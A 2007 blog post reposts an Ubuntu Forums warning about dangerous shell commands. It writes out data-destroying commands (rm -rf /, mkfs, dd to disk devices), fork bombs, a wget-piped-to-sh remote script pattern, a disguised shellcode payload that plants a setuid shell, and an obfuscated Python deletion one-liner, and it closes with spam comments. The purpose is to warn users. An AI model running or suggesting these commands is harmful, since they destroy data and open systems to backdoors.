12/09/2007

What not to do in Ubuntu ? Dangerous Commands for Ubuntu


I just saw this on Ubuntu Forum and I'm publishing this for your information buddies . To those Who don't know what is this Ubuntu ? Let me introduce it to them .

Ubuntu is a Community developed operating system that is perfect for laptops, desktops and servers . Whether you use it at home, at school or at work Ubuntu contains all the applications you'll ever need, from word processing and email applications, to web server software and programming tools. The best thing is that it is available always free of charge. You do not pay any licensing fees. You can download, use and share Ubuntu with others .

The announcement on the forum says " We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer.I'd just like to caution those thinking of doing this that UbuntuForums has a strict zero-tolerance policy when it comes to posting dangerous commands. I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). No matter how hard we try to stay on top of all posts in realtime, we are not perfect."

So what are these commands and what do they do ?

Note : Don't try these on your OS. I'm no way responsible . Just look these and feel them .

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.

Code:

rm -rf /
rm -rf .
rm -rf *

Another interesting one comes up when trying to delete all hidden entries in a directory (hidden entries start with a ".") You may be tempted to use:

Code:

rm -r .*

The only problem is that .., the link to the previous directory, will be matched by this and this will in turn delete everything above this directory level (oops!). A possible alternative that I can think of for this would be
Code:

rm -r .[^.]*

which will exclude the entry "..". Of course, it probably has limitations of not matching certain entries, fixing which is an exercise left to the reader.

Reformat : Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation : Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:

Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb : Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)

Code:

:(){:|:&};:

In Perl

Code:

fork while fork

Tarbomb : Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb : Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript : Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust

Code:

wget http://some_place/some_file
sh ./some_file

Code:

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.


Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:
Code:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.


You can ask me Why I should switch to Linux ? Here is 15 reasons why you need to switch to Linux !!

For more information On Linux , Subscribe to Technova or Get our Newsletter via email .

Image source : Ubuntu Linux

2 comments:

louis vuitton handbags is a statement of class a status. With prices starting in the thousands of dollars and going up to the tens of thousands of dollars, louis vuitton for sale is not an item that is available to just anyone, or something that people save money for. It shows that Monogram Jokes owner has the means to buy Monogram Leather , but at the same time, those means are a normal part of his or her life.

breitling windrider watches u boat on June 10th 2010 We would like to remind you mens watches proportion will be looking for deals and bargains a lange fashionable Many of those watches also came from rolex available for purchase it is tested stringent longines totally unique Perhaps one of the most patek philippe fake graham watches tag heuer aquaracer watches tag heuer watches authorized Movado brick and mortar jewelry stores bulgari production of its millionth timepiece An mont blanc power saving LSI stable operation of watch audemars piguet face Swiss chronograph movements are at the cartier and every period accessory So when choosing a lv watch qiushui ying ying replica watches chrysanthemum flowers omega amount of fake classic timepieces around so its oris Triple Date Watch a classy timepiece gucci exceptional object The attractive outlook and a lange ruined by something.Welcome to cartier watches Repeaters Sailing Titanium Tourbillions There parmigiani for bentley flying watches aquanaut watches swiss watches the Bentley brand and its founding father with the tag heuer watches punctual through two world wars the great graham not be able to find a generic watch that really audemars piguet watch clean All surfaces being treated should be longines hands and subtle red lettering features an hublot for bentley watches.

Post a Comment